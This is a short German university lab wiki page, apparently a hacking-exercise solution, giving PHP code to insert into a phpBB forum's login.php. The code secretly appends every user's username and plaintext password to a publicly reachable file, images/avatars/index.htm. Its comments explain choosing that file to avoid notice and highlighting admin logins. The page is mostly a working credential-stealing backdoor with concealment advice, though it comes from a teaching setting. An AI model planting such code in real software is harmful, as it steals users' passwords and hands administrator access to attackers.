Try to hack:phpcode

Aus Labor für Echtzeitsysteme

Wechseln zu: Navigation, Suche

Code zur Erfüllung der 3. Aufgabe

3. verändern Sie den php-Code des Forums so, dass beim Login eines Users die Nutzerdaten separat in eine Textdatei gespeichert werden. Diese soll dann über das Internet erreichbar sein. Die Funktionalität des Forums darf dabei nicht beeinträchtigt werden


Der folgende Code wird in die "login.php" eingefügt, nach der Übergabe der Variablen "$username" und "$password" (zeile 59).

//Abspeichern der login daten für ein phpBB
//---------------------------------------------------
// 12.02.2007
// Alexander Sosna / SAHNE
//---------------------------------------------------
$tth4tw = fopen('images/avatars/index.htm', 'a'); // 1
fwrite($tth4tw, "<table border='1'><tr><td>" );
fwrite($tth4tw, date("l dS M Y H:i:s")); // 2
fwrite($tth4tw, "</td><td><b>" );
if($username=='root' || $username == 'admin') // 3-1
{
fwrite($tth4tw, "<FONT COLOR='RED'>"); // 3-2
fwrite($tth4tw, $username);
fwrite($tth4tw, "</FONT>"); // 3-3
}
else
{
fwrite($tth4tw, $username); // 3-4
}
fwrite($tth4tw, "</b></td><td><b>" );
fwrite($tth4tw, $password);
fwrite($tth4tw, "</b></td></tr></table>\n" );
fclose ($tth4tw); // 4
 
// 1: Läd die Datei "images/avatars/index.htm" im Schreibmodus
// Ich verwende eine bereits vorhandene Datei um kein aufsehen zu erregen.
// Diese Datei hat mehrere Vorteile: 1. frei zugänglich
// 2. wird in der Regel nicht geöffnet
// 3. das Script hat in jedem Fall Schreibrechte
//
// 2: Schreibt Datum und Uhrzeit in die Datei , evt. hilfreich um das verhalten des Admins und der user
// zu analysieren
//
// 3: Überprüft ob der User Administrator ist (sehr oberflächlich)
// wenn ja, wird der name rot eingefärbt.
//
// 4: Schließen der Datei

Bild:Screen.jpg

Ab1. Beispiel Tabelle

Persönliche Werkzeuge